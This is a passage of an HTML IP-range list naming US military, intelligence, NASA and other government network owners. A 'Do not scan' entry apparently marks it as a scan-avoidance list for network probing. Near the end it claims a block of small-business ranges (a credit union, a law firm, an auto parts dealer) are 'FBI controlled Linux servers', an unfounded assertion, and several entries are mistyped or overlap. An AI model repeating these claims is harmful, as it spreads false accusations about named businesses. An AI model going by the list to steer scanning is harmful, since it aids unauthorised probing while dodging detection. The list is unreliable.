/>132.57.0.0 Castle Air Force Base<br />132.58.0.0 Nellis Air Force Base<br />132.59.0.0 24Comm Squadron\SCSNA<br />132.60.0.0 - 132.60.255.255 42ND COMMUNICATION SQUADRON<br />132.61.0.0 SSG/SIN<br />132.62.0.0 - 132.62.255.255 377 COMMUNICATION SQUADRON<br />132.79.0.0 Army National Guard Bureau<br />132.80.0.0 - 132.80.255.255 NGB-AIS-OS<br />132.80.0.0 - 132.85.255.255 National Guard Bureau<br />132.82.0.0 Army National Guard Bureau<br />132.86.0.0 National Guard Bureau<br />132.87.0.0 - 132.93.255.255 National Guard Bureau<br />132.94.0.0 Army National Guard Bureau<br />132.95.0.0 - 132.103.255.255 National Guard Bureau<br />132.95.0.0 - 132.108.0.0 DOD Network Information Center<br />132.104.0.0 - 132.104.255.255 Army National Guard Bureau<br />132.105.0.0 - 132.108.255.255 Army National Guard Bureau<br />132.109.0.0 National Guard Bureau<br />132.110.0.0 - 132.116.255.255 Army National Guard Bureau<br />132.114.0.0 Army National Guard<br />132.117.0.0 Army National Guard Bureau<br />132.118.0.0 - 132.132.0.0 Army National Guard Bureau<br />132.122.0.0 South Carolina Army National Guard, USPFO<br />132.133.0.0 National Guard Bureau<br />132.134.0.0 - 132.143.255.255 National Guard Bureau<br />132.159.0.0 Army Information Systems Command<br />132.193.0.0 Army Research Office<br />132.250.0.0 Naval Research Laboratory<br /><br />RANGE 134<br />134.5.0.0 Lockheed Aeronautical Systems Company<br />134.11.0.0 The Pentagon<br />134.12.0.0 NASA Ames Research Center<br />134.51.0.0 Boeing Military Aircraft Facility<br />134.52.*.* Boeing Corporation<br />134.78.0.0 Army Information Systems Command-ATCOM<br />134.80.0.0 Army Information Systems Command<br />134.118.0.0 NASA/Johnson Space Center<br />134.131.0.0 Wright-Patterson Air Force Base<br />134.136.0.0 Wright-Patterson Air Force Base<br />134.164.0.0 Army Engineer Waterways Experiment Station<br />134.165.0.0 Headquarters Air Force Space Command<br />134.194.0.0 U.S. Army Aberdeen Test Center<br />134.205.0.0 7th Communications Group<br />134.207.0.0 Naval Research Laboratory<br />134.229.0.0 Navy Regional Data Automation Center<br />134.230.0.0 Navy Regional Data Automation Center<br />134.232.0.0 - 134.232.255.255 U.S. Army, Europe<br />134.233.0.0 HQ 5th Signal Command<br />134.234.0.0 - 134.234.255.255 Southern European Task Force<br />134.235.0.0 HQ 5th Signal Command<br />134.240.0.0 U.S. Military Academy<br />136.149.0.0 Air Force Military Personnel Center<br /><br />RANGE 136<br />136.178.0.0 NASA Research Network<br />136.188.0.0 - 136.197.255.255 Defense Intelligence Agency<br />136.207.0.0 69th Signal Battalion<br />136.208.0.0 HQ, 5th Signal Command<br />136.209.0.0 HQ 5th Signal Command<br />136.210.0.0 HQ 5th Signal Command<br />136.212.0.0 HQ 5th Signal Command<br />136.213.0.0 HQ, 5th Signal Command<br />136.214.0.0 HQ, 5th Signal Command<br />136.215.0.0 HQ, 5th Signal Command<br />136.216.0.0 HQ, 5th Signal Command<br />136.217.0.0 HQ, 5th Signal Command<br />136.218.0.0 HQ, 5th Signal Command<br />136.219.0.0 HQ, 5th Signal Command<br />136.220.0.0 HQ, 5th Signal Command<br />136.221.0.0 HQ, 5th Signal Command<br />136.222.0.0 HQ, 5th Signal Command<br /><br /><br />RANGE 137<br />137.1.0.0 Whiteman Air Force Base<br />137.2.0.0 George Air Force Base<br />137.3.0.0 Little Rock Air Force Base<br />137.4.0.0 - 137.4.255.255 437 CS/SC<br />137.5.0.0 Air Force Concentrator Network<br />137.6.0.0 Air Force Concentrator Network<br />137.11.0.0 HQ AFSPC/SCNNC<br />137.12.0.0 Air Force Concentrator Network<br />137.17.* National Aerospace Laboratory<br />137.24.0.0 Naval Surface Warfare Center<br />137.29.0.0 First Special Operations Command<br />137.67.0.0 Naval Warfare Assessment Center<br />137.94.* Royal Military College<br />137.95.* Headquarters, U.S. European Command<br />137.126.0.0 USAF MARS<br />137.127.* Army Concepts Analysis Agency<br />137.128.* U.S. ARMY Tank-Automotive Command<br />137.130.0.0 Defense Information Systems Agency<br />137.209.0.0 Defense Information Systems Agency<br />137.210.0.0 Defense Information Systems Agency<br />137.211.0.0 Defense Information Systems Agency<br />137.212.0.0 Defense Information Systems Agency<br />137.231.0.0 HQ 5th Signal Command<br />137.232.0.0 Defense Information Systems Agency<br />137.233.0.0 Defense Information Systems Agency<br />137.234.0.0 Defense Information Systems Agency<br />137.235.0.0 Defense Information Systems Agency<br />137.240.0.0 Air Force Materiel Command<br />137.241.0.0 75 ABW<br />137.242.0.0 Air Force Logistics Command<br />137.243.0.0 77 CS/SCCN<br />137.244.0.0 78 CS/SCSC<br />137.245.0.0 Wright Patterson Air Force Base<br />137.246.0.0 United States Atlantic Command Joint Training<br /><br />RANGE 138<br />138.13.0.0 Air Force Systems Command<br />138.27.0.0 Army Information Systems Command<br />138.50.0.0 HQ 5th Signal Command<br />138.65.0.0 HQ, 5th Signal Command<br />138.76.0.0 NASA Headquarters<br />138.109.0.0 Naval Surface Warfare Center<br />138.115.0.0 NASA Information and Electronic Systems Laboratory<br />138.135.0.0 - 138.135.255.255 DEFENSE PROCESSING CENTERPERAL HARBOR<br />138.136.0.0 - 138.136.255.255 Navy Computers and Telecommunications<br />Station<br />138.137.0.0 Navy Regional Data Automation Center (NARDAC)<br />138.139.0.0 Marine Corps Air Station<br />138.140.0.0 Navy Regional Data Automation Center<br />138.141.0.0 Navy Regional Data Automation Center<br />138.142.0.0 Navy Regional Data Automation Center<br />138.143.0.0 Navy Regional Data Automation Center<br />138.144.0.0 NAVCOMTELCOM<br />138.145.0.0 NCTS WASHINGTON<br />138.146.0.0 NCTC<br />138.147.0.0 NCTC<br />138.148.0.0 NCTC<br />138.149.0.0 NCTC<br />138.150.0.0 NCTC<br />138.151.0.0 NCTC<br />138.152.0.0 NCTC<br />138.153.0.0 Yokosuka Naval Base<br />138.154.0.0 NCTC<br />138.155.0.0 NCTC<br />138.156.0.0 Marine Corps Central Design &amp; Prog. Activity<br />138.157.0.0 - 138.157.255.255 Marine Corps Central Design &amp; Prog.<br />Activity<br />138.158.0.0 Marine Corps Central Design &amp; Prog. Activity<br />138.159.0.0 NCTC<br />138.160.0.0 Naval Air Station<br />138.161.0.0 NCTC<br />138.162.0.0 NCTC<br />138.163.0.0 NCTC<br />138.164.0.0 NCTC<br />138.165.0.0 NCTC<br />138.166.0.0 NCTC<br />138.167.0.0 NOC, MCTSSA, East<br />138.168.0.0 Marine Corps Central Design &amp; Prog. Activity<br />138.169.0.0 NAVAL COMPUTER AND TELECOMM<br />138.169.12.0 NAVAL COMPUTER AND TELECOMM<br />138.169.13.0 NAVAL COMPUTER AND TELECOMM<br />138.170.0.0 NCTC<br />138.171.0.0 NCTC<br />138.172.0.0 NCTC<br />138.173.0.0 NCTC<br />138.174.0.0 NCTC<br />138.175.0.0 NCTC<br />138.176.0.0 NCTC<br />138.177.0.0 NCTS Pensacola<br />138.178.0.0 NCTC<br />138.179.0.0 NCTC<br />138.180.0.0 NCTC<br />138.181.0.0 NCTC<br />138.182.0.0 CNO N60<br />138.183.0.0 NCTC<br />138.184.0.0 NCTS<br />138.193.0.0 NASA/Yellow Creek<br /><br />RANGE 139<br />139.31.0.0 20th Tactical Fighter Wing<br />139.32.0.0 48th Tactical Fighter Wing<br />139.33.0.0 36th Tactical Fighter Wing<br />139.34.0.0 52nd Tactical Fighter Wing<br />139.35.0.0 50th Tactical Fighter Wing<br />139.36.0.0 66th Electronic Combat Wing<br />139.37.0.0 26th Tactical Reconnaissance Wing<br />139.38.0.0 32nd Tactical Fighter Squadron<br />139.39.0.0 81st Tactical Fighter Wing<br />139.40.0.0 10th Tactical Fighter Wing<br />139.41.0.0 39th Tactical Air Control Group<br />139.42.0.0 40th Tactical Air Control Group<br />139.43.0.0 401st Tactical Fighter Wing<br />139.124.* Reseau Infomratique<br />139.142.*.*<br /><br />RANGE 140<br />140.1.0.0 Defense Information Systems Agency<br />140.3.0.0 Defense Information Systems Agency<br />140.4.0.0 Defense Information Systems Agency<br />140.5.0.0 Defense Information Systems Agency<br />140.6.0.0 Defense Information Systems Agency<br />140.7.0.0 Defense Information Systems Agency<br />140.8.0.0 Defense Information Systems Agency<br />140.9.0.0 Defense Information Systems Agency<br />140.10.0.0 Defense Information Systems Agency<br />140.11.0.0 Defense Information Systems Agency<br />140.12.0.0 Defense Information Systems Agency<br />140.13.0.0 Defense Information Systems Agency<br />140.14.0.0 DISA Columbus Level II NOC<br />140.15.0.0 Defense Information Systems Agency<br />140.16.0.0 Defense Information Systems Agency<br />140.17.0.0 Defense Information Systems Agency<br />140.18.0.0 Defense Information Systems Agency<br />140.19.0.0 Defense Information Systems Agency<br />140.20.0.0 Defense Information Systems Agency<br />140.21.0.0 Defense Information Systems Agency<br />140.22.0.0 Defense Information Systems Agency<br />140.23.0.0 Defense Information Systems Agency<br />140.24.0.0 ASIC ALLIANCE-MARLBORO<br />140.25.0.0 Defense Information Systems Agency<br />140.26.0.0 Defense Information Systems Agency<br />140.27.0.0 Defense Information Systems Agency<br />140.28.0.0 Defense Information Systems Agency<br />140.29.0.0 Defense Information Systems Agency<br />140.30.0.0 Defense Information Systems Agency<br />140.31.0.0 Defense Information Systems Agency<br />140.32.0.0 Defense Information Systems Agency<br />140.33.0.0 Defense Information Systems Agency<br />140.34.0.0 Defense Information Systems Agency<br />140.35.0.0 Defense Information Systems Agency<br />140.36.0.0 Defense Information Systems Agency<br />140.37.0.0 Defense Information Systems Agency<br />140.38.0.0 Defense Information Systems Agency<br />140.39.0.0 Defense Information Systems Agency<br />140.40.0.0 Defense Information Systems Agency<br />140.41.0.0 Defense Information Systems Agency<br />140.42.0.0 Defense Information Systems Agency<br />140.43.0.0 Defense Information Systems Agency<br />140.44.0.0 Defense Information Systems Agency<br />140.45.0.0 Defense Information Systems Agency<br />140.46.0.0 Defense Information Systems Agency<br />140.47.0.0 - 140.47.255.255 Defense Information Systems Agency<br />140.47.0.0 - 140.48.255.255 DOD Network Information Center<br />140.48.0.0 - 140.48.255.255 Defense Information Systems Agency<br />140.49.0.0 Defense Information Systems Agency<br />140.50.0.0 Defense Information Systems Agency<br />140.51.0.0 Defense Information Systems Agency<br />140.52.0.0 Defense Information Systems Agency<br />140.53.0.0 Defense Information Systems Agency<br />140.54.0.0 Defense Information Systems Agency<br />140.55.0.0 Defense Information Systems Agency<br />140.56.0.0 Defense Information Systems Agency<br />140.57.0.0 Defense Information Systems Agency<br />140.58.0.0 Defense Information Systems Agency<br />140.59.0.0 Defense Information Systems Agency<br />140.60.0.0 Defense Information Systems Agency<br />140.61.0.0 Defense Information Systems Agency<br />140.62.0.0 Defense Information Systems Agency<br />140.63.0.0 Defense Information Systems Agency<br />140.64.0.0 Defense Information Systems Agency<br />140.65.0.0 Defense Information Systems Agency<br />140.66.0.0 Defense Information Systems Agency<br />140.67.0.0 Defense Information Systems Agency<br />140.68.0.0 Defense Information Systems Agency<br />140.69.0.0 Defense Information Systems Agency<br />140.70.0.0 Defense Information Systems Agency<br />140.71.0.0 Defense Information Systems Agency<br />140.72.0.0 Defense Information Systems Agency<br />140.73.0.0 Defense Information Systems Agency<br />140.74.0.0 - 140.74.255.255 Defense Information Systems Agency<br />140.100.0.0 Naval Sea Systems Command<br />140.139.0.0 HQ US Army Medical Research and Development Command<br />140.154.0.0 HQ 5th Signal Command<br />140.155.0.0 HQ, 5th Signal Command<br />140.156.0.0 HQ, 5th Signal Command<br />140.175.0.0 Scott Air Force Base<br />140.178.0.0 Naval Undersea Warfare Center Division, Keyport<br />140.187.0.0 Fort Bragg<br />140.194.0.0 US Army Corps of Engineers<br />140.195.0.0 Naval Sea Systems Command<br />140.199.0.0 Naval Ocean Systems Center<br />140.201.0.0 HQ, 5th Signal Command<br />140.202.0.0 106TH SIGNAL BRIGADE<br /><br />RANGE 143<br />143.45.0.0 58th Signal Battalion<br />143.46.0.0 U.S. Army, 1141st Signal Battalion<br />143.68.0.0 Headquarters, USAISC<br />143.69.0.0 Headquarters, USAAISC<br />143.70.0.0 Headquarters, USAAISC<br />143.71.0.0 Headquarters, USAAISC<br />143.72.0.0 Headquarters, USAAISC<br />143.73.0.0 Headquarters, USAAISC<br />143.74.0.0 Headquarters, USAAISC<br />143.75.0.0 Headquarters, USAAISC<br />143.76.0.0 Headquarters, USAAISC<br />143.77.0.0 Headquarters, USAAISC<br />143.78.0.0 Headquarters, USAAISC<br />143.79.0.0 Headquarters, USAAISC<br />143.80.0.0 Headquarters, USAAISC<br />143.81.0.0 Headquarters, USAAISC<br />143.82.0.0 Headquarters, USAAISC<br />143.84.0.0 Headquarters, USAAISC<br />143.85.0.0 Headquarters, USAAISC<br />143.86.0.0 Headquarters, USAAISC<br />143.87.0.0 Headquarters, USAAISC<br />143.232.0.0 NASA Ames Research Center<br /><br />RANGE 144<br />144.99.0.0 United States Army Information Systems Command<br />144.109.0.0 Army Information Systems Command<br />144.143.0.0 Headquarters, Third United States Army<br />144.144.0.0 Headquarters, Third United States Army<br />144.146.0.0 Commander, Army Information Systems Center<br />144.147.0.0 Commander, Army Information Systems Center<br />144.170.0.0 HQ, 5th Signal Command<br />144.192.0.0 United States Army Information Services Command-Campbell<br />144.233.0.0 Defense Intelligence Agency<br />144.234.0.0 Defense Intelligence Agency<br />144.235.0.0 Defense Intelligence Agency<br />144.236.0.0 Defense Intelligence Agency<br />144.237.0.0 Defense Intelligence Agency<br />144.238.0.0 Defense Intelligence Agency<br />144.239.0.0 Defense Intelligence Agency<br />144.240.0.0 Defense Intelligence Agency<br />144.241.0.0 Defense Intelligence Agency<br />144.242.0.0 Defense Intelligence Agency<br />144.252.0.0 U.S. Army LABCOM<br /><br />RANGE 146<br />146.17.0.0 HQ, 5th Signal Command<br />146.80.0.0 Defence Research Agency<br />146.98.0.0 HQ United States European Command<br />146.154.0.0 NASA/Johnson Space Center<br />146.165.0.0 NASA Langley Research Center<br /><br />RANGE 147<br />147.35.0.0 HQ, 5th Signal Command<br />147.36.0.0 HQ, 5th Signal Command<br />147.37.0.0 HQ, 5th Signal Command<br />147.38.0.0 HQ, 5th Signal Command<br />147.39.0.0 HQ, 5th Signal Command<br />147.40.0.0 HQ, 5th Signal Command<br />147.42.0.0 Army CALS Project<br />147.103.0.0 Army Information Systems Software Center<br />147.104.0.0 Army Information Systems Software Center<br />147.159.0.0 Naval Air Warfare Center, Aircraft Division<br />147.168.0.0 Naval Surface Warfare Center<br />147.169.0.0 HQ, 5th Signal Command<br />147.198.0.0 Army Information Systems Command<br />147.199.0.0 Army Information Systems Command<br />147.238.0.0 Army Information Systems Command<br />147.239.0.0 1112th Signal Battalion<br />147.240.0.0 US Army Tank-Automotive Command<br />147.242.0.0 19th Support Command<br />147.248.0.0 Fort Monroe DOIM<br />147.254.0.0 7th Communications Group<br /><br />RANGE 148<br />148.114.0.0 NASA, Stennis Space Center<br /><br />RANGE 150<br />150.113.0.0 1114th Signal Battalion<br />150.114.0.0 1114th Signal Battalion<br />150.125.0.0 Space and Naval Warfare Command<br />150.133.0.0 10th Area Support Group<br />150.144.0.0 NASA Goodard Space Flight Center<br />150.149.0.0 Army Information Systems Command<br />150.157.0.0 USAISC-Fort Lee<br />150.184.0.0 Fort Monroe DOIM<br />150.190.0.0 USAISC-Letterkenny<br />150.196.0.0 USAISC-LABCOM<br /><br />RANGE 152<br />152.82.0.0 7th Communications Group of the Air Force<br />152.151.0.0 U.S. Naval Space &amp; Naval Warfare Systems Command<br />152.152.0.0 NATO Headquarters<br />152.154.0.0 Defense Information Systems Agency<br />152.229.0.0 Defense MegaCenter (DMC) Denver<br /><br />RANGE 153<br />153.21.0.0 USCENTAF/SCM<br />153.22.0.0 USCENTAF/SCM<br />153.23.0.0 USCENTAF/SCM<br />153.24.0.0 USCENTAF/SCM<br />153.25.0.0 USCENTAF/SCM<br />153.26.0.0 USCENTAF/SCM<br />153.27.0.0 USCENTAF/SCM<br />153.28.0.0 USCENTAF/SCM<br />153.29.0.0 USCENTAF/SCM<br />153.30.0.0 USCENTAF/SCM<br />153.31.0.0 Federal Bureau of Investigation<br /><br />RANGE 155<br />155.5.0.0 1141st Signal Bn<br />155.6.0.0 1141st Signal Bn<br />155.7.0.0 American Forces Information<br />155.8.0.0 U.S. ArmyFort Gordon<br />155.9.0.0 - 155.9.255.255 United States Army Information Systems Command<br />155.74.0.0 PEO STAMIS<br />155.75.0.0 US Army Corps of Engineers<br />155.76.0.0 PEO STAMIS<br />155.77.0.0 PEO STAMIS<br />155.78.0.0 PEO STAMIS<br />155.79.0.0 US Army Corps of Engineers<br />155.80.0.0 PEO STAMIS<br />155.81.0.0 PEO STAMIS<br />155.82.0.0 PEO STAMIS<br />155.83.0.0 US Army Corps of Enginers<br />155.84.0.0 PEO STAMIS<br />155.85.0.0 PEO STAMIS<br />155.86.0.0 US Army Corps of Engineers<br />155.87.0.0 PEO STAMIS<br />155.88.0.0 PEO STAMIS<br />155.96.0.0 Drug Enforcement Administration<br />155.149.0.0 1112th Signal Battalion<br />155.155.0.0 HQ, 5th Signal Command<br />155.178.0.0 Federal Aviation Administration<br />155.213.0.0 USAISC Fort Benning<br />155.214.0.0 Director of Information Management<br />155.215.0.0 USAISC-FT DRUM<br />155.216.0.0 TCACCIS Project Management Office<br />155.217.0.0 Directorate of Information Management<br />155.218.0.0 USAISC<br />155.219.0.0 DOIM/USAISC Fort Sill<br />155.220.0.0 USAISC-DOIM<br />155.221.0.0 USAISC-Ft Ord<br /><br />RANGE 156<br />156.9.0.0 U. S. Marshals Service<br /><br />RANGE 157<br />157.150.0.0 United Nations<br />157.153.0.0 COMMANDER NAVAL SURFACE U.S. PACIFIC FLEET<br />157.202.0.0 US Special Operations Command<br />157.217.0.0 U. S. Strategic Command<br /><br />RANGE 158<br />158.1.0.0 Commander, Tooele Army Depot<br />158.2.0.0 USAMC Logistics Support Activity<br />158.3.0.0 U.S. Army TACOM<br />158.4.0.0 UASISC Ft. Carson<br />158.5.0.0 1112th Signal Battalion<br />158.6.0.0 USAISC-Ft. McCoy<br />158.7.0.0 USAISC-FLW<br />158.8.0.0 US Army Soldier Support Center<br />158.9.0.0 USAISC-CECOM<br />158.10.0.0 GOC<br />158.11.0.0 UASISC-Vint Hill<br />158.12.0.0 US Army Harry Diamond Laboratories<br />158.13.0.0 USAISC DOIM<br />158.14.0.0 1112th Signal Battalion<br />158.15.0.0 - 158.15.255.255 Defense Megacenter Huntsville<br />158.16.0.0 Rocky Mountain Arsenal (PMRMA)<br />158.17.0.0 Crane Army Ammunition Activity<br />158.18.0.0 Defense Finance &amp; Accounting Service Center<br />158.19.0.0 DOIM<br />158.20.0.0 DOIM<br />158.235.0.0 Marine Corps Central Design and Programming Activity<br />158.243.0.0 Marine Corps Central Design and Programming Activity<br />158.244.0.0 Marine Corps Central Design and Programming Activity<br />158.245.0.0 Marine Corps Central Design and Programming Activity<br />158.246.0.0 Marine Corps Central Design and Programming Activity<br /><br />RANGE 159<br />159.120.0.0 Naval Air Systems Command (Air 4114)<br /><br />RANGE 160<br />160.132.0.0 US Army Recruiting Command<br />160.135.0.0 36th Signal BN<br />160.138.0.0 USAISC<br />160.139.0.0 USAISC<br />160.140.0.0 HQ, United States Army<br />160.143.0.0 USAISC<br />160.145.0.0 1101st Signal Brigade<br />160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS<br />160.150.0.0 Commander, Moncrief Army Hospital<br /><br />RANGE 161<br />161.124.0.0 NAVAL WEAPONS STATION<br /><br />RANGE 162<br />162.32.0.0 Naval Aviation Depot Pensacola<br />162.45.0.0 Central Intelligence Agency<br />162.46.0.0 Central Intelligence Agency<br /><br />RANGE 163<br />163.205.0.0 NASA Kennedy Space Center<br />163.206.0.0 NASA Kennedy Space Center<br /><br />RANGE 164<br />164.45.0.0 Naval Ordnance Center, Pacific Division<br />164.49.0.0 United States Army Space and Strategic Defense<br />164.158.0.0 Naval Surface Warfare Center<br />164.217.0.0 Institute for Defense Analyses<br />164.218.0.0 Bureau of Naval Personnel<br />164.219.0.0 HQ USAFE WARRIOR PREPARATION CENTER<br />164.220.0.0 - 164.220.255.255 NIMIP/TIP/NEWNET<br />164.221.0.0 - 164.221.255.255 Information Technology<br />164.223.0.0 Naval Undersea Warfare Center<br />164.224.0.0 Secretary of the Navy<br />164.225.0.0 U.S. Army Intelligence and Security Command<br />164.226.0.0 Naval Exchange Service Command<br />164.227.0.0 Naval Surface Warfare Center, Crane Division<br />164.228.0.0 USCINCPAC J21T<br />164.229.0.0 NCTS-NOLA<br />164.230.0.0 Naval Aviation Depot<br />164.231.0.0 Military Sealift Command<br />164.232.0.0 - 164.232.255.255 United States Southern Command<br /><br />RANGE 167<br />167.44.0.0 Government Telecommunications Agency<br /><br />RANGE 168<br />168.68.0.0 USDA Office of Operations<br />168.85.0.0 Fort Sanders Alliance<br />168.102.0.0 Indiana Purdue Fort Wayne<br /><br />RANGE 169<br />169.252.0.0 - 169.253.0.0 U.S. Department of State<br /><br />RANGE 194<br /><br />RANGE 195<br />195.10.* Various - Do not scan<br /><br />RANGE 199<br />199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA<br /><br />RANGE 203<br />203.59.0.0 - 203.59.255.255 Perth Australia iiNET<br /><br />RANGE 204<br />204.34.0.0 - 204.34.15.0 IPC JAPAN<br />204.34.0.0 - 204.37.255.0 DOD Network Information Center<br />204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery<br />204.34.32.0 - 204.34.63.0 USACOM<br />204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE<br />204.34.128.0 DISA-Eucom / BBN-STD, Inc.<br />204.34.129.0 Defense Technical Information Center<br />204.34.130.0 GSI<br />204.34.131.0 NSA NAPLES ITALY<br />204.34.132.0 NAVSTA ROTA SPAIN<br />204.34.133.0 NAS SIGONELLA ITALY<br />204.34.134.0 Naval Air Warfare Center Aircraft Division<br />204.34.135.0 GSI<br />204.34.136.0 Naval Undersea Warfare Center USRD - Orlando<br />204.34.137.0 Joint Spectrum Center<br />204.34.138.0 GSI<br />204.34.139.0 HQ, JFMO Korea, Headquarters<br />204.34.140.0 DISA D75<br />204.34.141.0 U. S. Naval Air Facility, Atsugi Japan<br />204.34.142.0 Naval Enlisted Personnel Management Center<br />204.34.143.0 Afloat Training Group Pacific<br />204.34.144.0 HQ Special Operations Command - Europe<br />204.34.145.0 Commander Naval Base Pearl Harbor<br />204.34.147.0 NAVSEA Information Management Improvement Program<br />204.34.148.0 Q112<br />204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures<br />204.34.150.0 Resource Consultants, Inc.<br />204.34.151.0 Personnel Support Activity, San Diego<br />204.34.152.0 NAVAL AIR FACILITY, ADAK<br />204.34.153.0 NAVSEA Logistics Command Detachment<br />204.34.154.0 PEARL HARBOR NAVAL SHIPYARD<br />204.34.155.0 PEARL HARBOR NAVAL SHIPYARD<br />204.34.156.0 Defense Photography School<br />204.34.157.0 - 204.34.160.0 Defense Information School<br />204.34.161.0 Naval Air Systems Command<br />204.34.162.0 Puget Sound Naval Shipyard<br />204.34.163.0 Joint Precision Strike Demonstration<br />204.34.164.0 Naval Pacific Meteorology and Ocean<br />204.34.165.0 Joint Precision Strike Demonstration<br />204.34.167.0 USAF<br />204.34.168.0 Commander<br />204.34.169.0 Naval Air Warfare Center<br />204.34.170.0 Naval Air Systems Command<br />204.34.171.0 NAVSTA SUPPLY DEPARTMENT<br />204.34.173.0 SUBMEPP Activity<br />204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN<br />204.34.176.0 DISA-PAC,IPC-GUAM<br />204.34.177.0 Satellite Production Test Center<br />204.34.181.0 940 Air Refueling Wing<br />204.34.182.0 Defense Megacenter Warner Robins<br />204.34.183.0 GCCS Support Facility<br />204.34.184.0 Nav Air Tech Serv Facility-Detachment<br />204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA<br />204.34.186.0 Defense Logistics Agency - Europe<br />204.34.187.0 NAVMASSO<br />204.34.188.0 Commander-In-Chief, US Pacific Fleet<br />204.34.189.0 Defense MegaCenter - St Louis<br />204.34.190.0 NAVMASSO<br />204.34.192.0 HQ SOCEUR<br />204.34.193.0 Second Marine Expeditionary Force<br />204.34.194.0 Second Marine Expeditionary Force<br />204.34.195.0 Second Marine Expeditionary Force<br />204.34.196.0 NAVCOMTELSTAWASHDC<br />204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER<br />204.34.198.0 Naval Observatory Detachment, Colorado<br />204.34.199.0 NAVILCODETMECH<br />204.34.200.0 Navy Environmental Preventive Medicine<br />204.34.201.0 Port Hueneme Division, Naval Surf<br />204.34.202.0 Naval Facilities Engineering Housing<br />204.34.203.0 NAVSEA Logistics Command Detachment<br />204.34.204.0 Naval Air Warfare Center<br />204.34.205.0 Portsmouth Naval Shipyard<br />204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER<br />204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific<br />204.34.211.0 USAF Academy<br />204.34.212.0 3rd Combat Service Support<br />204.34.213.0 1st Radio Battalion<br />204.34.214.0 OASD (Health Affairs)<br />204.34.215.0 Second Marine Expeditionary Force<br />204.34.216.0 1st Marine Air Wing<br />204.34.217.0 SA-ALC/LTE<br />204.34.218.0 3rd Marine<br />204.34.219.0 Communications and Electronics<br />204.34.220.0 G-6 Operations<br />204.34.221.0 G-6 Operations<br />204.34.222.0 G-6 Operations<br />204.34.223.0 G-6 Operations<br />204.34.224.0 G-6 Operations<br />204.34.225.0 Joint Interoperability Test Command<br />204.34.226.0 NAVMASSO<br />204.34.227.0 NAVMASSO<br />204.34.228.0 - 204.34.228.255 Field Command Defense Nuclear Agency<br />204.34.229.0 Naval Space Command<br />204.34.230.0 Naval Pacific Meteorology and Oceanography<br />204.34.232.0 Military Family Housing<br />204.34.233.0 - 204.34.233.255 Navy Material Transportation Office<br />204.34.234.0 NAVMASSO<br />204.34.235.0 Defense Finance and Accounting Service<br />204.34.237.0 European Stars and Stripes<br />204.34.238.0 Pacific Stars and Stripes<br />204.34.239.0 PUGET SOUND NAVAL SHIPYARD<br />204.34.240.0 Nval Station, Guantanamo Bay<br />204.34.242.0 COMNAVSURFPAC<br />204.34.243.0 NAVMASSO<br />204.34.244.0 Amphibious Force, Seventh Fleet, U. S. Navy<br />204.34.245.0 USAF SpaceCommand<br />204.34.246.0 USAF<br />204.34.247.0 U.S. Army Special Operations Command<br />204.34.248.0 FLEET COMBAT TRAINING CENTER ATLA<br />204.34.249.0 Naval Aviation Depot North Island<br />204.34.250.0 NAVMASSO<br />204.34.251.0 NAVSEA Log Command Detachment Pacific<br />204.34.252.0 Command Special Boat Squadron One<br />204.34.253.0 AFPCA/GNNN<br />204.34.254.0 Navy Environmental Preventive Medicine<br /><br />RANGE 205<br />205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval<br />Warfare System Command, Washington DC - SPAWAR<br />205.96.* - 205.103.*<br /><br />RANGE 207<br />207.30.* Sprint/United Telephone of Florida<br /><br />All the below are FBI controlled Linux servers &amp; IPs/IP-Ranges<br /><br />207.60.0.0 - 207.60.255.0 The Internet Access Company<br />207.60.2.128 - 207.60.2.255 Abacus Technology<br />207.60.3.0 - 207.60.3.127 Mass Electric Construction Co.<br />207.60.3.128 - 207.60.3.255 Peabody Proberties Inc<br />207.60.4.0 - 207.60.4.127 Northern Electronics<br />207.60.4.128 - 207.60.4.255 Posternak, Blankstein &amp; Lund<br />207.60.5.64 - 207.60.5.127 Woodard &amp; Curran<br />207.60.5.192 - 207.60.5.255 On Line Services<br />207.60.6.0 - 207.60.6.63 The 400 Group<br />207.60.6.64 - 207.60.6.127 RD Hunter and Company<br />207.60.6.128 - 207.60.6.191 Louis Berger and Associates<br />207.60.6.192 - 207.60.6.255 Ross-Simons<br />207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank<br />207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee<br />207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc<br />207.60.8.0 - 207.60.8.255 Sippican<br />207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co<br />207.60.9.32 - 207.60.9.63 Escher Group Ltd<br />207.60.9.64 - 207.60.9.95 West Suburban Elder<br />207.60.9.96 - 207.60.9.127 Central Bank<br />207.60.9.128 - 207.60.9.159 Danick Systems<br />207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO<br />207.60.9.192 - 207.60.9.223 BSCC<br />207.60.13.16 - 207.60.13.23 Patrons Insurance Group<br />207.60.13.40 - 207.60.13.47 Athera Technologies<br />207.60.13.48 - 207.60.13.55 Service Edge Partners Inc<br />207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League<br />207.60.13.64 - 207.60.13.71 SierraCom<br />207.60.13.72 - 207.60.13.79 AI/ FOCS<br />207.60.13.80 - 207.60.13.87 Extreme soft<br />207.60.13.96 - 207.60.13.103 Eaton Seo Corp<br />207.60.13.112 - 207.60.13.119 C. White<br />207.60.13.120 - 207.60.13.127 Athera<br />207.60.13.128 - 207.60.13.135 Entropic Systems, INC<br />207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates<br />207.60.13.160 - 207.60.13.167 Jamestown Distribution<br />207.60.13.168 - 207.60.13.175 C&amp;M Computers<br />207.60.13.176 - 207.60.13.183 ABC Used Auto Parts<br />207.60.13.184 - 207.60.13.191 Tomas Weldon<br />207.60.13.192 - 207.60.13.199 Tage Inns<br />207.60.13.200 - 207.60.13.207 Control Module Inc<br />207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems<br />207.60.13.216 - 207.60.13.223 Eastern Bearings<br 